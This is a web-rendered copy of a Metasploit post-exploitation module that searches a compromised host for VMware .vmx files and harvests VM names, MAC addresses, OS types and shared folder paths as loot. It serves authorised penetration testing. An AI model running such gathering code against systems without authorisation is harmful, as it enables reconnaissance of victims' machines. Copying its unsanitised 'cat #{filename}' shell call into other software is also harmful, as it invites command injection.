Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/multi/gather/find_vmx.rb
19851 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
require 'yaml'
7
8
class MetasploitModule < Msf::Post
9
include Msf::Post::File
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'Multi Gather VMWare VM Identification',
16
'Description' => %q{
17
This module will attempt to find any VMWare virtual machines stored on the target.
18
},
19
'License' => MSF_LICENSE,
20
'Author' => ['theLightCosine'],
21
'Platform' => %w[bsd linux osx unix win],
22
'SessionTypes' => ['shell', 'meterpreter' ],
23
'Compat' => {
24
'Meterpreter' => {
25
'Commands' => %w[
26
core_channel_eof
27
core_channel_open
28
core_channel_read
29
core_channel_write
30
stdapi_fs_search
31
]
32
}
33
},
34
'Notes' => {
35
'Stability' => [CRASH_SAFE],
36
'SideEffects' => [],
37
'Reliability' => []
38
}
39
)
40
)
41
end
42
43
def run
44
if session_has_search_ext
45
vms = meterp_search
46
elsif session.platform =~ /unix|linux|bsd|osx/
47
vms = nix_shell_search
48
end
49
report_vms(vms) if vms
50
end
51
52
def report_vms(vms)
53
output = "VMWare Virtual Machines\n"
54
output << "--------------------------------\n"
55
vms.each do |vm|
56
next if vm.empty?
57
58
output << "Name: #{vm['name']}\n"
59
output << "Virtual CPUs: #{vm['cpus']}\n"
60
output << "Memory: #{vm['memsize']}\n"
61
output << "Operating System: #{vm['os']}\n"
62
output << "Network Type: #{vm['eth_type']}\n"
63
output << "MAC Address: #{vm['mac']}\n"
64
output << "Shared Folders:\n"
65
vm['SharedFolders'].each do |folder|
66
output << "\tHost Location: #{folder}\n"
67
end
68
output << "\n"
69
end
70
print_good output
71
store_loot('vmware_vms', 'text/plain', session, output, 'vmware_vms.txt', 'VMWare Virtual Machines')
72
end
73
74
def nix_shell_search
75
vms = []
76
res = session.shell_command('find / -name "*.vmx" -type f -print 2>/dev/null')
77
res.each_line do |filename|
78
next unless filename.start_with? '/'
79
80
begin
81
parse = session.shell_command("cat #{filename}")
82
vms << parse_vmx(parse, filename)
83
rescue StandardError
84
print_error "Could not read #{filename} properly"
85
end
86
end
87
return vms
88
end
89
90
def meterp_search
91
vms = []
92
res = session.fs.file.search(nil, '*.vmx', true, -1)
93
res.each do |vmx|
94
filename = "#{vmx['path']}\\#{vmx['name']}"
95
next if filename.end_with? '.vmxf'
96
97
begin
98
config = client.fs.file.new(filename, 'r')
99
parse = config.read
100
vms << parse_vmx(parse, filename)
101
rescue StandardError
102
print_error "Could not read #{filename} properly"
103
end
104
end
105
return vms
106
end
107
108
def parse_vmx(vmx_data, filename)
109
vm = {}
110
unless vmx_data.nil? || vmx_data.empty?
111
vm['SharedFolders'] = []
112
vmx_data.each_line do |line|
113
data = line.split('=')
114
vm['path'] = filename
115
case data[0]
116
when 'memsize '
117
vm['memsize'] = data[1].gsub!('"', '').lstrip.chomp
118
when 'displayName '
119
vm['name'] = data[1].gsub!('"', '').lstrip.chomp
120
when 'guestOS '
121
vm['os'] = data[1].gsub!('"', '').lstrip.chomp
122
when 'ethernet0.connectionType '
123
vm['eth_type'] = data[1].gsub!('"', '').lstrip.chomp
124
when 'ethernet0.generatedAddress '
125
vm['mac'] = data[1].gsub!('"', '').lstrip.chomp
126
when 'numvcpus '
127
vm['cpus'] = data[1].gsub!('"', '').lstrip.chomp
128
when 'sharedFolder0.hostPath '
129
vm['SharedFolders'] << data[1].gsub!('"', '').lstrip.chomp
130
end
131
end
132
vm['cpus'] ||= '1'
133
end
134
return vm
135
end
136
137
def session_has_search_ext
138
return !!(session.fs and session.fs.file)
139
rescue NoMethodError
140
return false
141
end
142
143
end
144
145